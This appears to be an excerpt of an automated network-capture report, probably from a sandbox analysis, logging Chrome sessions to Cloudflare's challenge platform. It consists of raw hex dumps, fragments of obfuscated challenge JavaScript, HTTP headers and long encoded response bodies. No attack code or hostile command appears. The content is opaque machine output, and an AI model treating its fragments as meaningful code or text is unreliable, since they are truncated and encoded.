                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:09 UTC1369INData Raw: 3e 3e 3d 31 2c 48 3d 3d 30 26 26 28 48 3d 6a 2c 47 3d 64 5b 68 75 28 39 39 34 29 5d 28 6f 2c 49 2b 2b 29 29 2c 4a 7c 3d 64 5b 68 75 28 31 32 30 39 29 5d 28 30 3c 4c 3f 31 3a 30 2c 46 29 2c 46 3c 3c 3d 31 29 3b 4d 3d 65 28 4a 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 31 3a 66 6f 72 28 4a 3d 30 2c 4b 3d 4d 61 74 68 5b 68 75 28 31 36 30 37 29 5d 28 32 2c 31 36 29 2c 46 3d 31 3b 64 5b 68 75 28 31 31 35 39 29 5d 28 46 2c 4b 29 3b 4c 3d 47 26 48 2c 48 3e 3e 3d 31 2c 30 3d 3d 48 26 26 28 48 3d 6a 2c 47 3d 64 5b 68 75 28 31 33 37 32 29 5d 28 6f 2c 49 2b 2b 29 29 2c 4a 7c 3d 28 30 3c 4c 3f 31 3a 30 29 2a 46 2c 46 3c 3c 3d 31 29 3b 4d 3d 65 28 4a 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 32 3a 72 65 74 75 72 6e 27 27 7d 66 6f 72 28 45 3d 73 5b 33 5d 3d 4d 2c 44 5b 68 75
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: >>=1,H==0&&(H=j,G=d[hu(994)](o,I++)),J|=d[hu(1209)](0<L?1:0,F),F<<=1);M=e(J);break;case 1:for(J=0,K=Math[hu(1607)](2,16),F=1;d[hu(1159)](F,K);L=G&H,H>>=1,0==H&&(H=j,G=d[hu(1372)](o,I++)),J|=(0<L?1:0)*F,F<<=1);M=e(J);break;case 2:return''}for(E=s[3]=M,D[hu
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:09 UTC1369INData Raw: 54 69 6d 65 6f 75 74 28 66 75 2c 30 29 7d 29 3a 73 65 74 54 69 6d 65 6f 75 74 28 66 75 2c 30 29 2c 66 76 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 68 58 2c 66 2c 67 2c 68 2c 69 2c 6a 2c 6b 29 7b 66 6f 72 28 68 58 3d 67 49 2c 66 3d 7b 27 57 53 6e 57 70 27 3a 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 72 65 74 75 72 6e 20 6c 28 6d 29 7d 2c 27 74 77 55 79 55 27 3a 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 72 65 74 75 72 6e 20 6c 2d 6d 7d 2c 27 51 66 6e 52 61 27 3a 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 72 65 74 75 72 6e 20 6d 26 6c 7d 7d 2c 6b 2c 68 3d 33 32 2c 6a 3d 65 4d 5b 68 58 28 31 34 30 35 29 5d 5b 68 58 28 31 31 38 31 29 5d 2b 27 5f 27 2b 30 2c 6a 3d 6a 5b 68 58 28 32 38 32 29 5d 28 2f 2e 2f 67 2c 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 2c 68 59 29 7b 68 59
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: Timeout(fu,0)}):setTimeout(fu,0),fv=function(c,hX,f,g,h,i,j,k){for(hX=gI,f={'WSnWp':function(l,m){return l(m)},'twUyU':function(l,m){return l-m},'QfnRa':function(l,m){return m&l}},k,h=32,j=eM[hX(1405)][hX(1181)]+'_'+0,j=j[hX(282)](/./g,function(l,m,hY){hY
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:09 UTC1369INData Raw: 74 72 79 7b 66 6f 72 28 6c 3d 69 31 28 31 34 33 34 29 5b 69 31 28 36 34 36 29 5d 28 27 7c 27 29 2c 6d 3d 30 3b 21 21 5b 5d 3b 29 7b 73 77 69 74 63 68 28 6c 5b 6d 2b 2b 5d 29 7b 63 61 73 65 27 30 27 3a 6e 3d 65 4d 5b 69 31 28 31 34 30 35 29 5d 5b 69 31 28 37 30 35 29 5d 3f 6b 5b 69 31 28 38 39 38 29 5d 28 27 68 2f 27 2b 65 4d 5b 69 31 28 31 34 30 35 29 5d 5b 69 31 28 37 30 35 29 5d 2c 27 2f 27 29 3a 27 27 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 31 27 3a 6f 3d 6b 5b 69 31 28 31 31 36 39 29 5d 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 32 27 3a 78 5b 69 31 28 36 33 35 29 5d 28 6f 2c 47 2c 21 21 5b 5d 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 33 27 3a 78 5b 69 31 28 31 32 36 32 29 5d 28 6b 5b 69 31 28 38 39 38 29 5d 28 6b 5b 69 31 28 38 39 38 29
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: try{for(l=i1(1434)[i1(646)]('|'),m=0;!![];){switch(l[m++]){case'0':n=eM[i1(1405)][i1(705)]?k[i1(898)]('h/'+eM[i1(1405)][i1(705)],'/'):'';continue;case'1':o=k[i1(1169)];continue;case'2':x[i1(635)](o,G,!![]);continue;case'3':x[i1(1262)](k[i1(898)](k[i1(898)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:09 UTC1369INData Raw: 6a 5b 69 32 28 39 36 39 29 5d 28 6b 5b 69 32 28 39 35 35 29 5d 28 6c 29 2c 2d 31 29 29 3f 65 4d 5b 69 32 28 34 34 35 29 5d 28 66 75 6e 63 74 69 6f 6e 28 69 33 29 7b 69 33 3d 69 32 2c 65 4d 5b 69 33 28 31 33 35 29 5d 28 29 7d 2c 31 65 33 29 3a 28 6d 3d 5b 69 32 28 31 30 33 32 29 2b 64 2c 69 32 28 37 34 36 29 2b 65 2c 69 32 28 32 39 34 29 2b 66 2c 6a 5b 69 32 28 31 33 32 30 29 5d 2b 67 2c 6a 5b 69 32 28 31 37 33 29 5d 2b 4a 53 4f 4e 5b 69 32 28 31 35 38 31 29 5d 28 68 29 5d 5b 69 32 28 34 32 32 29 5d 28 69 32 28 35 36 36 29 29 2c 65 4d 5b 69 32 28 34 34 35 29 5d 28 66 75 6e 63 74 69 6f 6e 28 69 34 2c 6f 29 7b 28 69 34 3d 69 32 2c 6a 5b 69 34 28 31 33 33 34 29 5d 3d 3d 3d 69 34 28 31 33 33 32 29 29 3f 28 6f 3d 7b 7d 2c 6f 5b 69 34 28 31 32 33 31 29 5d 3d 6a
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: j[i2(969)](k[i2(955)](l),-1))?eM[i2(445)](function(i3){i3=i2,eM[i3(135)]()},1e3):(m=[i2(1032)+d,i2(746)+e,i2(294)+f,j[i2(1320)]+g,j[i2(173)]+JSON[i2(1581)](h)][i2(422)](i2(566)),eM[i2(445)](function(i4,o){(i4=i2,j[i4(1334)]===i4(1332))?(o={},o[i4(1231)]=j


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              20192.168.2.449765104.18.95.414431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:09 UTC926OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/2026836972:1728411327:0J2ljC7SPOhv7bDpKXPkeCVvQYtqToQCpwF-xLifL5A/8cf87240ceda19cb/6c598c69372390f HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 2867
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              CF-Challenge: 6c598c69372390f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Origin: https://challenges.cloudflare.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/iyj2o/0x4AAAAAAAkfyuN_fqTRgfZH/auto/fbE/normal/auto/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:09 UTC2867OUTData Raw: 76 5f 38 63 66 38 37 32 34 30 63 65 64 61 31 39 63 62 3d 77 61 4c 47 7a 47 74 47 76 47 4f 47 79 47 54 4f 69 76 4f 69 6c 25 32 62 54 6c 54 35 30 6f 56 69 4a 69 24 71 47 76 6c 47 69 31 6f 69 33 24 47 68 6d 69 2d 68 4c 69 76 69 4c 2b 38 35 38 69 39 54 45 69 63 4c 69 32 69 30 4c 69 5a 69 56 34 56 58 24 69 77 44 37 66 69 54 46 69 45 32 37 69 7a 59 38 4e 69 58 2b 38 6b 31 34 35 71 41 4f 59 69 46 43 6d 54 5a 58 56 47 54 56 43 65 24 73 31 69 43 69 4a 6d 54 78 37 38 61 54 31 6e 69 58 65 4b 48 50 4b 6b 36 78 56 49 59 68 4a 69 69 71 69 30 41 61 39 43 6c 41 43 7a 6d 69 76 46 2b 6d 4c 46 54 59 79 4f 67 46 62 46 54 49 58 4f 4f 37 69 38 41 51 77 69 69 67 38 54 51 4f 68 2b 69 57 38 69 54 77 58 65 6d 69 6a 31 45 4d 79 71 4f 51 47 69 31 69 64 67 65 6f 4e 65 6d 67 69 54 56
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: v_8cf87240ceda19cb=waLGzGtGvGOGyGTOivOil%2bTlT50oViJi$qGvlGi1oi3$Ghmi-hLiviL+858i9TEicLi2i0LiZiV4VX$iwD7fiTFiE27izY8NiX+8k145qAOYiFCmTZXVGTVCe$s1iCiJmTx78aT1niXeKHPKk6xVIYhJiiqi0Aa9ClACzmivF+mLFTYyOgFbFTIXOO7i8AQwiig8TQOh+iW8iTwXemij1EMyqOQGi1idgeoNemgiTV
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:09 UTC749INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 19:13:09 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 154924
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              cf-chl-gen: 2Bcjlut/U0zOuCKItBWiVRtUUveOIFcdn8moSZGFGx+EWQ1f8p6Dcuik01Kc+U1UuBRX7Q1+hSAkVLsjsoz6uwYJEYC519Hi2yPqoBfP0vZrVk3QxQGb4jFw7g39gO2MqTyBa5S+y0Kzj2wHEntGbjhiPf1AxNuq3+k+XFpY/Qkq2A5EAAv2Xd1WpQ4hSeM0e8X/+E15/tJiSX1JGvDAiTUIdRR0/mF7BJYBtDkxNrZG7i1FC6YyGIQouWEKDbr6jkZpUJK91j/mvwBCQZiHWzSrZUJgBoJlgMD3vG6qhtAk0H5oriXTUueFl0adBQmr4ytoiOFtQDFkjHrdMHl3n22/VgeA1ciJBtJAH/AQm312AoKwWCdFBcwd98PneMaRyjuVjULwzWuz8HckMm0BNB3wqU6bmG673SZMrxc1dCUWTFo1W6qHmUL16RM72rrbsLBlI88Et+kPBDYvcM8BsspXe385S0eQtfBR0ACZi+0GanYd2pAV/DBlogZVf1M+d06f3GNMU4ltWtmU$BGo3x/+jCr5GKLaq
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              CF-RAY: 8cf87251cb568cca-EWR
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:09 UTC620INData Raw: 6f 36 65 38 72 4a 36 4a 75 72 57 56 6a 35 75 38 75 4c 53 42 68 73 69 7a 75 61 7a 4d 6a 63 61 70 78 61 36 6e 74 71 50 55 6f 35 61 4d 79 4a 4b 59 6e 61 71 74 6f 4b 2f 4f 77 37 66 69 30 61 4c 46 6e 4c 71 6a 71 61 58 49 75 4d 65 76 38 4f 48 32 7a 4e 48 4e 39 4d 7a 74 36 38 76 64 41 62 2f 32 2b 41 54 6a 78 50 62 6b 35 64 54 6a 35 66 72 44 34 4e 72 50 7a 75 6f 55 7a 39 34 4a 37 2f 62 54 46 76 41 4f 43 52 72 30 45 67 2f 64 34 51 41 59 4a 75 59 6c 2f 68 30 61 2b 2f 62 6c 4b 42 6e 70 36 77 77 6c 42 79 37 76 38 53 4d 70 43 7a 7a 39 4b 51 39 41 41 44 45 38 4a 52 45 6f 46 69 66 37 4b 54 6c 47 47 54 63 78 53 79 67 6e 53 43 4d 75 54 6c 51 68 56 6b 51 38 53 54 5a 51 47 31 6b 33 56 54 4e 56 51 6c 70 4a 5a 6b 68 73 4b 43 56 69 4e 31 39 61 62 58 46 50 4e 56 39 6d 52 6b 4a
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: o6e8rJ6JurWVj5u8uLSBhsizuazMjcapxa6ntqPUo5aMyJKYnaqtoK/Ow7fi0aLFnLqjqaXIuMev8OH2zNHN9Mzt68vdAb/2+ATjxPbk5dTj5frD4NrPzuoUz94J7/bTFvAOCRr0Eg/d4QAYJuYl/h0a+/blKBnp6wwlBy7v8SMpCzz9KQ9AADE8JREoFif7KTlGGTcxSygnSCMuTlQhVkQ8STZQG1k3VTNVQlpJZkhsKCViN19abXFPNV9mRkJ
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:09 UTC1369INData Raw: 57 49 74 4a 57 32 75 53 68 33 31 53 63 57 4e 72 62 6e 4a 71 57 59 6c 63 6c 46 4a 70 6c 31 74 68 6f 61 42 32 57 70 71 6f 6d 59 32 57 6f 47 6d 62 61 61 6d 63 62 70 61 72 6b 5a 69 48 62 49 36 30 6c 6f 32 48 64 35 7a 44 6c 62 74 2f 6f 4c 54 44 71 61 43 4c 76 4b 4b 64 78 36 53 63 6f 62 48 4f 72 70 47 50 6b 63 33 62 77 34 36 74 72 74 37 63 75 64 6a 63 32 72 47 33 31 64 4c 71 33 61 76 47 33 4e 65 35 79 61 33 6e 73 38 76 4f 33 72 44 55 74 74 72 30 33 66 50 75 76 74 48 54 39 4d 4d 45 32 65 4c 58 77 63 54 2b 42 65 76 75 44 39 6a 36 79 78 4c 46 79 77 38 4f 43 39 49 59 30 39 6e 38 48 2f 50 35 32 75 30 5a 48 79 51 51 39 52 55 43 4a 76 54 72 2f 65 73 63 49 51 30 44 37 76 50 78 49 68 58 32 43 79 6b 57 4e 69 6e 33 4f 7a 49 4f 47 52 4d 59 4f 68 34 38 42 7a 5a 41 4f 67 73
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: WItJW2uSh31ScWNrbnJqWYlclFJpl1thoaB2WpqomY2WoGmbaamcbparkZiHbI60lo2Hd5zDlbt/oLTDqaCLvKKdx6ScobHOrpGPkc3bw46trt7cudjc2rG31dLq3avG3Ne5ya3ns8vO3rDUttr03fPuvtHT9MME2eLXwcT+BevuD9j6yxLFyw8OC9IY09n8H/P52u0ZHyQQ9RUCJvTr/escIQ0D7vPxIhX2CykWNin3OzIOGRMYOh48BzZAOgs
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:09 UTC1369INData Raw: 34 61 49 5a 47 35 77 5a 46 56 74 63 49 69 56 6c 59 74 30 64 35 57 59 58 6f 65 64 6c 47 4b 70 61 5a 74 37 70 70 65 63 61 37 46 74 6e 48 43 48 72 37 69 35 73 70 71 59 6e 72 69 6f 71 37 79 65 75 61 57 38 6b 72 61 54 74 71 43 56 71 35 66 43 30 4b 43 44 68 4c 2f 41 74 6f 37 51 6f 6f 2f 4e 75 63 57 5a 73 36 72 62 77 4c 2f 65 34 73 43 66 78 4b 43 69 78 36 76 6c 33 61 62 69 77 64 4c 4f 79 4d 2f 4b 72 61 2b 33 71 39 47 7a 39 65 33 75 32 74 71 2b 75 41 48 52 33 4f 55 41 78 51 58 35 2f 66 6b 4e 35 73 76 6d 2f 41 45 4d 34 78 58 4f 42 68 4d 47 45 65 7a 6e 48 65 59 41 49 68 48 71 2f 4f 30 56 33 52 50 39 48 53 6f 69 42 51 33 75 42 67 7a 70 2f 76 73 4a 44 79 37 74 37 6a 6b 6e 44 41 59 37 44 51 6b 55 48 78 6f 30 2b 67 34 37 49 79 45 42 2f 50 30 72 4b 51 63 6a 49 77 70 49
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 4aIZG5wZFVtcIiVlYt0d5WYXoedlGKpaZt7ppeca7FtnHCHr7i5spqYnrioq7yeuaW8kraTtqCVq5fC0KCDhL/Ato7Qoo/NucWZs6rbwL/e4sCfxKCix6vl3abiwdLOyM/Kra+3q9Gz9e3u2tq+uAHR3OUAxQX5/fkN5svm/AEM4xXOBhMGEeznHeYAIhHq/O0V3RP9HSoiBQ3uBgzp/vsJDy7t7jknDAY7DQkUHxo0+g47IyEB/P0rKQcjIwpI
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:09 UTC1369INData Raw: 35 4e 6e 49 56 37 6c 70 70 36 58 31 78 61 6a 71 42 37 63 70 64 70 69 47 57 68 68 32 6d 6a 65 59 6c 2f 63 4b 43 6e 70 4c 69 79 73 49 32 36 6d 71 2b 71 6a 4c 71 68 74 5a 71 6b 70 38 43 7a 67 6f 62 4b 77 73 43 70 71 4d 62 4f 73 49 79 4d 71 73 4f 32 6b 4b 37 50 78 4a 58 59 76 62 57 5a 74 74 2b 35 35 4b 36 35 74 36 43 2b 79 64 54 74 36 4d 33 58 37 2b 7a 76 79 61 7a 4b 30 37 54 32 35 37 44 58 79 65 66 54 30 66 7a 68 32 4d 73 41 38 50 66 6b 33 64 37 47 42 66 62 33 35 77 51 46 32 75 44 30 2f 67 6a 69 43 38 72 70 44 75 6e 31 44 74 37 77 2b 68 49 54 37 66 4d 62 47 76 6b 67 39 52 72 32 2b 52 33 6c 4c 65 62 36 4a 51 7a 74 41 2f 4c 33 44 41 38 48 44 76 49 55 4b 50 6b 4f 39 78 5a 41 41 55 4d 53 41 51 6b 46 45 78 52 4a 44 44 73 6b 55 55 4d 6e 44 6b 73 68 51 6a 51 6e 54
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 5NnIV7lpp6X1xajqB7cpdpiGWhh2mjeYl/cKCnpLiysI26mq+qjLqhtZqkp8CzgobKwsCpqMbOsIyMqsO2kK7PxJXYvbWZtt+55K65t6C+ydTt6M3X7+zvyazK07T257DXyefT0fzh2MsA8Pfk3d7GBfb35wQF2uD0/gjiC8rpDun1Dt7w+hIT7fMbGvkg9Rr2+R3lLeb6JQztA/L3DA8HDvIUKPkO9xZAAUMSAQkFExRJDDskUUMnDkshQjQnT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:09 UTC1369INData Raw: 62 6d 31 70 75 6e 4b 4f 51 6e 35 71 46 68 61 6d 66 62 61 75 4d 6f 34 74 39 6b 49 74 73 70 62 65 4e 69 6e 4b 79 73 58 32 52 65 4a 52 2f 65 38 47 43 77 73 48 47 77 71 69 43 7a 49 79 5a 6d 38 69 35 7a 73 76 52 6b 72 57 77 6f 4e 4f 6d 70 4c 48 65 76 71 6d 57 72 38 32 76 76 61 4c 45 33 71 65 78 77 61 76 68 75 71 36 39 72 61 79 75 7a 4d 69 2f 74 66 44 4c 31 4d 4c 79 32 64 50 4c 37 2f 62 67 75 39 67 41 2b 73 55 45 78 51 66 6a 32 4e 6e 61 77 50 76 43 7a 78 51 41 7a 52 45 55 42 4e 50 75 39 39 49 4c 45 4e 76 35 2f 4e 7a 36 44 78 55 45 35 4e 6e 79 41 4f 62 68 34 69 30 42 2b 51 77 4d 48 68 4d 4f 4e 7a 51 41 39 69 6f 55 42 7a 77 55 43 42 62 37 46 54 67 68 50 54 63 2f 46 44 30 34 53 45 55 61 52 69 70 41 53 6b 55 4a 42 69 56 54 4d 54 4a 48 4c 78 6f 30 48 53 38 76 55 68
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: bm1punKOQn5qFhamfbauMo4t9kItspbeNinKysX2ReJR/e8GCwsHGwqiCzIyZm8i5zsvRkrWwoNOmpLHevqmWr82vvaLE3qexwavhuq69rayuzMi/tfDL1MLy2dPL7/bgu9gA+sUExQfj2NnawPvCzxQAzREUBNPu99ILENv5/Nz6DxUE5NnyAObh4i0B+QwMHhMONzQA9ioUBzwUCBb7FTghPTc/FD04SEUaRipASkUJBiVTMTJHLxo0HS8vUh
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:09 UTC1369INData Raw: 5a 35 65 62 5a 6f 68 66 6e 57 70 69 6b 61 47 43 68 61 56 31 72 59 79 55 64 62 4f 57 72 5a 65 39 6d 58 79 56 75 71 43 32 72 38 53 43 76 62 53 70 68 4d 62 43 69 63 76 4b 6e 4a 4b 39 78 73 75 6c 6f 59 76 4c 30 4a 6a 5a 6b 4c 47 57 34 4d 48 44 30 4e 65 39 77 62 4b 66 36 2b 71 73 32 61 58 62 72 36 66 46 37 73 44 78 36 36 2b 32 31 50 44 49 37 76 44 53 74 74 51 44 30 76 77 47 2b 74 7a 32 34 39 2f 71 2b 76 58 39 7a 63 66 72 42 51 4c 72 36 65 44 53 44 39 58 59 48 50 50 76 37 50 4d 67 45 74 37 30 2f 68 4d 63 45 2f 6f 62 34 77 55 42 49 2f 30 72 42 79 63 6d 46 44 44 7a 4c 76 45 67 47 65 73 73 38 79 63 70 2b 76 63 54 48 43 78 44 48 51 59 6a 49 67 63 33 4a 67 67 4d 53 6a 67 4f 4b 43 6f 63 54 6b 64 4c 4b 54 68 48 54 43 6f 34 4f 69 73 33 50 6a 67 30 4e 44 64 62 51 54 59
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: Z5ebZohfnWpikaGChaV1rYyUdbOWrZe9mXyVuqC2r8SCvbSphMbCicvKnJK9xsuloYvL0JjZkLGW4MHD0Ne9wbKf6+qs2aXbr6fF7sDx66+21PDI7vDSttQD0vwG+tz249/q+vX9zcfrBQLr6eDSD9XYHPPv7PMgEt70/hMcE/ob4wUBI/0rBycmFDDzLvEgGess8ycp+vcTHCxDHQYjIgc3JggMSjgOKCocTkdLKThHTCo4Ois3Pjg0NDdbQTY
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:09 UTC1369INData Raw: 48 6d 61 72 4b 39 70 63 61 53 57 68 34 79 7a 67 6f 61 70 6d 6e 6d 4a 73 37 53 69 67 36 4f 54 6d 37 69 79 74 59 65 46 70 63 4f 36 6f 63 61 4d 76 71 48 46 72 4c 44 57 72 62 71 7a 75 64 75 30 7a 4c 43 71 7a 39 44 51 74 61 36 64 31 4c 65 78 71 72 2f 4b 35 65 2f 6f 72 73 71 36 77 38 44 30 77 75 65 30 39 73 53 31 30 38 37 33 30 64 54 33 7a 4e 62 31 35 67 59 4a 2f 4d 58 62 78 67 41 46 35 4f 38 43 38 76 72 39 43 2f 54 6f 36 41 7a 35 30 2f 6f 61 2f 51 33 66 44 75 77 54 38 64 77 61 34 76 55 65 34 65 59 70 46 69 6b 73 36 43 44 77 41 66 45 70 49 69 4d 76 37 7a 54 30 44 51 63 54 43 69 76 33 4f 41 77 38 49 6a 77 48 49 54 59 46 47 52 52 4f 4f 55 31 4c 49 56 46 47 45 30 35 53 4e 43 6b 6c 52 31 4e 54 54 6c 49 39 57 31 59 30 4c 44 73 7a 47 46 55 79 5a 57 74 4d 61 79 4e 41
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: HmarK9pcaSWh4yzgoapmnmJs7Sig6OTm7iytYeFpcO6ocaMvqHFrLDWrbqzudu0zLCqz9DQta6d1Lexqr/K5e/orsq6w8D0wue09sS108730dT3zNb15gYJ/MXbxgAF5O8C8vr9C/To6Az50/oa/Q3fDuwT8dwa4vUe4eYpFiks6CDwAfEpIiMv7zT0DQcTCiv3OAw8IjwHITYFGRROOU1LIVFGE05SNCklR1NTTlI9W1Y0LDszGFUyZWtMayNA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:09 UTC1369INData Raw: 4b 4b 6c 49 39 78 65 59 36 74 75 33 36 71 65 6e 65 42 76 62 33 46 66 4d 53 31 79 49 71 33 7a 59 79 41 71 4d 66 4a 79 36 50 4e 6f 4a 43 72 6f 74 58 44 33 4a 71 54 73 65 43 6f 71 61 36 78 32 62 37 42 30 4a 72 68 33 63 58 65 75 2b 6e 71 33 63 54 71 76 73 44 77 35 72 4c 7a 38 73 69 34 39 4f 62 2b 2b 73 44 71 41 77 58 39 77 72 38 49 79 50 48 32 77 67 66 31 78 78 41 4f 36 50 44 4d 44 76 34 48 7a 68 45 45 36 41 63 46 36 75 6a 2b 2f 75 38 55 42 66 76 35 33 66 58 6d 41 42 6e 36 47 78 6f 6a 34 65 6b 65 45 2b 34 47 35 79 38 57 39 41 73 38 43 54 4c 33 4f 67 34 4e 46 42 6b 67 52 54 39 46 47 78 77 48 48 45 4d 68 53 6b 41 50 41 78 77 6f 4d 6b 70 43 52 6b 6f 33 4a 7a 56 53 47 30 30 7a 55 79 39 67 55 55 45 74 50 7a 73 37 4f 46 68 44 51 7a 31 63 54 30 73 2f 4c 6d 67 2f 4a
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: KKlI9xeY6tu36qeneBvb3FfMS1yIq3zYyAqMfJy6PNoJCrotXD3JqTseCoqa6x2b7B0Jrh3cXeu+nq3cTqvsDw5rLz8si49Ob++sDqAwX9wr8IyPH2wgf1xxAO6PDMDv4HzhEE6AcF6uj+/u8UBfv53fXmABn6Gxoj4ekeE+4G5y8W9As8CTL3Og4NFBkgRT9FGxwHHEMhSkAPAxwoMkpCRko3JzVSG00zUy9gUUEtPzs7OFhDQz1cT0s/Lmg/J
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:09 UTC1369INData Raw: 79 68 62 52 32 6e 36 2b 50 6f 5a 71 37 6f 63 64 2f 77 37 4b 37 6d 63 62 46 7a 59 33 49 6b 4b 69 76 7a 71 66 58 32 4a 50 57 74 72 6a 59 6e 74 79 5a 6e 36 79 37 32 72 65 31 72 37 79 2f 78 39 2f 62 78 64 6d 74 71 65 33 42 39 4f 76 54 30 72 66 4f 36 66 53 32 30 36 2b 32 76 74 44 62 34 63 37 37 77 76 49 42 41 75 44 6d 30 39 54 68 33 64 66 47 43 73 76 4d 44 64 50 49 47 4f 41 43 46 78 63 62 46 68 50 63 47 4e 38 4d 31 52 7a 6b 38 66 4d 6b 4a 50 62 30 4a 68 63 58 4b 69 77 72 4b 79 38 79 43 67 73 42 4e 67 33 77 42 44 51 33 4b 2f 73 2b 41 44 73 2f 51 44 51 56 42 30 63 64 42 68 52 47 4e 7a 64 49 53 45 73 37 54 6b 77 49 4b 6a 63 68 4b 53 35 54 55 56 59 64 46 6b 38 5a 49 32 4e 4e 4e 45 63 2f 58 45 64 57 59 53 56 70 4e 79 4a 65 4c 57 4e 6d 61 56 63 79 54 32 77 78 58 47
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: yhbR2n6+PoZq7ocd/w7K7mcbFzY3IkKivzqfX2JPWtrjYntyZn6y72re1r7y/x9/bxdmtqe3B9OvT0rfO6fS206+2vtDb4c77wvIBAuDm09Th3dfGCsvMDdPIGOACFxcbFhPcGN8M1Rzk8fMkJPb0JhcXKiwrKy8yCgsBNg3wBDQ3K/s+ADs/QDQVB0cdBhRGNzdISEs7TkwIKjchKS5TUVYdFk8ZI2NNNEc/XEdWYSVpNyJeLWNmaVcyT2wxXG


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              21192.168.2.44976635.190.80.14431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
